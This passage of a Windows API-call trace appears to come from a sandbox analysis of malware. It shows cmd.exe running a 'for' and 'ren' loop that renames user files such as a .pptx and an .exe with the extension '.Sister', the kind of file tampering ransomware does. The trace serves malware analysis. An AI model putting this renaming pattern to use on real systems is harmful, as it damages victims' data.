nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d33e60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.360] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"PXw-KbUDGxcG.pptx\" \"PXw-KbUDGxcG.pptx.Sister\" ") returned 48 [0305.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.360] GetFileType (hFile=0x50) returned 0x2 [0305.360] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.360] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.360] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x30) returned 1 [0305.361] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0305.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.361] GetFileType (hFile=0x50) returned 0x2 [0305.361] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.361] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.361] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.361] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.362] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0305.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.362] GetFileType (hFile=0x50) returned 0x2 [0305.362] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.362] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.363] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0305.381] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0305.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.381] GetFileType (hFile=0x50) returned 0x2 [0305.381] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.381] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.382] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0305.382] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0305.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.383] GetFileType (hFile=0x50) returned 0x2 [0305.383] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.383] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.384] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0305.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.389] GetFileType (hFile=0x50) returned 0x2 [0305.389] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.389] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.389] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d342e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d342e0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.391] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"PXw-KbUDGxcG.pptx.Sister\" \"PXw-KbUDGxcG.bat\" ") returned 47 [0305.391] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.391] GetFileType (hFile=0x50) returned 0x2 [0305.392] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.392] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.393] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2f) returned 1 [0305.393] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0305.393] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.393] GetFileType (hFile=0x50) returned 0x2 [0305.393] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.393] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0305.394] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.394] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0305.402] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.402] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.402] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.402] malloc (_Size=0xffce) returned 0x21eda27fd00 [0305.402] ??_V@YAXPEAX@Z () returned 0x21eda27fd00 [0305.402] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.403] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.403] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.403] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.403] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.403] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.403] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.403] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.403] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.403] ??_V@YAXPEAX@Z () returned 0x1 [0305.403] GetProcessHeap () returned 0x21ed8c70000 [0305.403] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd0) returned 0x21ed8d6c770 [0305.403] GetProcessHeap () returned 0x21ed8c70000 [0305.403] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c770, Size=0x70) returned 0x21ed8d67bb0 [0305.403] GetProcessHeap () returned 0x21ed8c70000 [0305.403] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67bb0) returned 0x70 [0305.403] GetProcessHeap () returned 0x21ed8c70000 [0305.403] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x78) returned 0x21ed8d675b0 [0305.404] GetProcessHeap () returned 0x21ed8c70000 [0305.404] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd0) returned 0x21ed8d6c3f0 [0305.404] GetProcessHeap () returned 0x21ed8c70000 [0305.404] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c3f0, Size=0x70) returned 0x21ed8d67130 [0305.404] GetProcessHeap () returned 0x21ed8c70000 [0305.404] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67130) returned 0x70 [0305.404] malloc (_Size=0xffce) returned 0x21eda27fd00 [0305.404] ??_V@YAXPEAX@Z () returned 0x21eda27fd00 [0305.404] GetProcessHeap () returned 0x21ed8c70000 [0305.404] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc75a0 [0305.404] GetProcessHeap () returned 0x21ed8c70000 [0305.404] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d59b60 [0305.404] _wcsicmp (_String1="PXw-KbUDGxcG.pptx", _String2=".") returned 66 [0305.404] _wcsicmp (_String1="PXw-KbUDGxcG.pptx", _String2="..") returned 66 [0305.404] GetFileAttributesW (lpFileName="PXw-KbUDGxcG.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\pxw-kbudgxcg.pptx")) returned 0x20 [0305.405] GetProcessHeap () returned 0x21ed8c70000 [0305.405] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed934ffb0 [0305.406] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed934ffc0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.406] SetErrorMode (uMode=0x0) returned 0x0 [0305.406] SetErrorMode (uMode=0x1) returned 0x0 [0305.406] GetFullPathNameW (in: lpFileName="PXw-KbUDGxcG.pptx", nBufferLength=0x7fe7, lpBuffer=0x21eda27fd00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\PXw-KbUDGxcG.pptx", lpFilePart=0xa6cf4fd660*="PXw-KbUDGxcG.pptx") returned 0x2b [0305.406] SetErrorMode (uMode=0x0) returned 0x1 [0305.406] GetProcessHeap () returned 0x21ed8c70000 [0305.406] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d59dd0 [0305.406] _wcsicmp (_String1="PXw-KbUDGxcG.pptx", _String2=".") returned 66 [0305.407] _wcsicmp (_String1="PXw-KbUDGxcG.pptx", _String2="..") returned 66 [0305.407] GetFileAttributesW (lpFileName="PXw-KbUDGxcG.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\pxw-kbudgxcg.pptx")) returned 0x20 [0305.407] ??_V@YAXPEAX@Z () returned 0x1 [0305.407] malloc (_Size=0xffce) returned 0x21eda27fd00 [0305.407] ??_V@YAXPEAX@Z () returned 0x21eda27fd00 [0305.407] malloc (_Size=0xffce) returned 0x21eda28fce0 [0305.407] ??_V@YAXPEAX@Z () returned 0x21eda28fce0 [0305.408] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\PXw-KbUDGxcG.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\pxw-kbudgxcg.pptx")) returned 0x20 [0305.408] malloc (_Size=0xffce) returned 0x21ed993f900 [0305.408] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.408] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\PXw-KbUDGxcG.pptx", fInfoLevelId=0x1, lpFindFileData=0x21ed8d59b70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d59b70) returned 0x21ed8cc7c60 [0305.408] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0305.408] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0305.408] ??_V@YAXPEAX@Z () returned 0x1 [0305.408] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\PXw-KbUDGxcG.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\pxw-kbudgxcg.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\PXw-KbUDGxcG.pptx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\pxw-kbudgxcg.pptx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0305.409] FindNextFileW (in: hFindFile=0x21ed8cc7c60, lpFindFileData=0x21ed8d59b70 | out: lpFindFileData=0x21ed8d59b70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e7917e0, ftCreationTime.dwHighDateTime=0x1d5ec7e, ftLastAccessTime.dwLowDateTime=0xfac4b9a0, ftLastAccessTime.dwHighDateTime=0x1d5ef01, ftLastWriteTime.dwLowDateTime=0xfac4b9a0, ftLastWriteTime.dwHighDateTime=0x1d5ef01, nFileSizeHigh=0x0, nFileSizeLow=0x180ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="PXw-KbUDGxcG.pptx", cAlternateFileName="")) returned 0 [0305.411] GetLastError () returned 0x12 [0305.411] FindClose (in: hFindFile=0x21ed8cc7c60 | out: hFindFile=0x21ed8cc7c60) returned 1 [0305.411] ??_V@YAXPEAX@Z () returned 0x1 [0305.411] ??_V@YAXPEAX@Z () returned 0x1 [0305.411] ??_V@YAXPEAX@Z () returned 0x1 [0305.411] ??_V@YAXPEAX@Z () returned 0x1 [0305.411] GetProcessHeap () returned 0x21ed8c70000 [0305.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7600 [0305.411] GetProcessHeap () returned 0x21ed8c70000 [0305.411] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95960, Size=0x16) returned 0x21ed8c95980 [0305.411] GetProcessHeap () returned 0x21ed8c70000 [0305.411] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95980) returned 0x16 [0305.411] GetProcessHeap () returned 0x21ed8c70000 [0305.411] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e30, Size=0x20) returned 0x21ed8d45e00 [0305.411] GetProcessHeap () returned 0x21ed8c70000 [0305.411] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45e00) returned 0x20 [0305.411] GetProcessHeap () returned 0x21ed8c70000 [0305.411] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61660 [0305.412] GetProcessHeap () returned 0x21ed8c70000 [0305.412] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61660, Size=0xb2) returned 0x21ed93b6870 [0305.412] GetProcessHeap () returned 0x21ed8c70000 [0305.412] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b6870) returned 0xb2 [0305.412] GetProcessHeap () returned 0x21ed8c70000 [0305.412] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d344b0 [0305.412] GetProcessHeap () returned 0x21ed8c70000 [0305.412] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d344b0, Size=0x30) returned 0x21ed8d344b0 [0305.412] GetProcessHeap () returned 0x21ed8c70000 [0305.412] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d344b0) returned 0x30 [0305.412] GetProcessHeap () returned 0x21ed8c70000 [0305.412] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d344f0 [0305.412] malloc (_Size=0x1ff9c) returned 0x21eda27fd00 [0305.413] GetProcessHeap () returned 0x21ed8c70000 [0305.413] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b61b0 [0305.413] GetProcessHeap () returned 0x21ed8c70000 [0305.413] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b54f0 [0305.413] ??_V@YAXPEAX@Z () returned 0x1 [0305.413] malloc (_Size=0x1ff9c) returned 0x21eda27fd00 [0305.413] GetProcessHeap () returned 0x21ed8c70000 [0305.413] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b55b0 [0305.413] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda27fd00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0305.413] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7720 [0305.414] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0305.414] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7720 [0305.414] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0305.414] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc7720 [0305.414] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0305.414] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0305.415] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.415] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.415] GetProcessHeap () returned 0x21ed8c70000 [0305.415] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67630 [0305.415] ??_V@YAXPEAX@Z () returned 0x1 [0305.415] ??_V@YAXPEAX@Z () returned 0x1 [0305.415] GetProcessHeap () returned 0x21ed8c70000 [0305.415] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d344f0, Size=0x490) returned 0x21ed8d344f0 [0305.415] GetProcessHeap () returned 0x21ed8c70000 [0305.415] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d344f0) returned 0x490 [0305.415] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0305.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.415] GetFileType (hFile=0x50) returned 0x2 [0305.415] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.415] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0305.417] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.417] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0305.424] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.424] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.424] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0305.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.424] GetFileType (hFile=0x50) returned 0x2 [0305.424] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.424] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0305.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.425] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0305.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.425] GetFileType (hFile=0x50) returned 0x2 [0305.425] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.425] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.426] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d344c0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d344c0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0305.426] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0305.426] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.426] GetFileType (hFile=0x50) returned 0x2 [0305.426] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.426] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0305.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.427] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0305.437] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0305.437] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.437] GetFileType (hFile=0x50) returned 0x2 [0305.437] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.437] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.438] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0305.443] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.444] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.444] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.444] malloc (_Size=0xffce) returned 0x21eda27fd00 [0305.444] ??_V@YAXPEAX@Z () returned 0x21eda27fd00 [0305.444] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.444] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.444] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.444] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.444] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.444] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.444] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.444] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.446] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.446] ??_V@YAXPEAX@Z () returned 0x1 [0305.446] GetProcessHeap () returned 0x21ed8c70000 [0305.446] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5eb40 [0305.447] GetProcessHeap () returned 0x21ed8c70000 [0305.447] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5eb40, Size=0x130) returned 0x21ed93b1e30 [0305.447] GetProcessHeap () returned 0x21ed8c70000 [0305.447] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b1e30) returned 0x130 [0305.447] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.447] malloc (_Size=0xffce) returned 0x21eda27fd00 [0305.447] ??_V@YAXPEAX@Z () returned 0x21eda27fd00 [0305.447] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.447] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda27fd00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", 